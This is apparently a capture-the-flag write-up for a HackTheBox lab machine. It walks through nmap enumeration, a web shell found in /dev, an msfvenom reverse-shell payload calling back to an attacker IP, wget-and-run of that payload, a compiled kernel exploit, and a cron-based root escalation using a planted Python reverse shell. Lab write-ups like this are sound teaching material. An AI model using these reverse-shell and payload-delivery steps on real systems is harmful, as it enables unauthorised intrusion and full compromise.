Machine ip — 10.10.10.68
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel’s Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/23%OT=80%CT=1%CU=30911%PV=Y%DS=2%DC=T%G=Y%TM=5D8824C
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)Uptime guess: 0.857 days (since Sun Sep 22 10:45:27 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Here we get to see that only port 80 seems to be open now let’s enumerate on http
Visited http page doesn’t seems to me giving more information to us
Let’s start with directory ( used dirsearch )
Here we found
dirsearch -u http://10.10.10.68 -e/
After moving further we found that /dev/ directory is having 2 php files and on running them they gives us shell of user “WWW-DATA”
using http://10.10.10.68/dev/phpbash.php
here we find that it’s giving us a web terminal where we can use it for gathering information
Here when we give commands at bottom of the page it gives us output at the main screen , let’s try using nc to get a reverse shell on our local pc
As we can see that we are unable to get a shell as it’s giving us errors for the “e” option , but there are many alternate ways to get a reverse shell let’s try them ….
Here first let’s start a reverse nc listener at out local pc
nc -nvlp 1234And let’s try alternate way to take a reverse shell , creating the reverse shell payload with msfvenom
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f elf > shell.elfThen wget it to our target pc , then give it permission to execute chmod 777 shell.elf then run it ./shell.elf
And here we get our reverse shell
Here we used LinEnum.sh to find some vulnerability for privilege escalation , using this we found that machine is having a kernel exploit and then we used 41458.c and then we got see that the target machine is not having GCC compiler on it so that we can compile it so we compile the exploit on our local pc then transferred the compiled exploit to machine and then run it
Usage :-
1. gcc poc.c -o pwnthen wget the pwn file form attacker pc to target pc
python -m SimpleHTTPServer 80 - attacker pc
wget http://10.10.14.19:80/pwn - target pcthen use ./pwn
And here we get the root shell
Got root.txt
…………………………….2nd way to exploit………………………………..
SECOND WAY — using sudo command
Here we can see that www-data user can use sudo command using the user scriptmanager , and when we see the / directory there is a new directory scripts as we are having sudo command to use scriptmanager user as per our utilization let’s see what does scripts directory contains
sudo -u scriptmanager ls -la /scripts 
And now when we run pspy32 to see what is this directory doing in background
Here we can see that whatever file scripts directory contains in it having .py extension so now let’s create a python reverse shell file and then place it at scripts directory and then let’s wait for the root to run ,
We can place our python file , you can script at reverse.py and change your ip and port in the script
Then get this to our victim pc using wget then move our python script to scripts directory so that it can run and we can get a reverse shell of root
Now let’s move this file to our scripts directory using
sudo -u scriptmanager cp /tmp/reverse.py /scripts/reverse.pyAnd start our nc at giver port in the script
Here we got the root
THANKYOU !!!!!!!!!
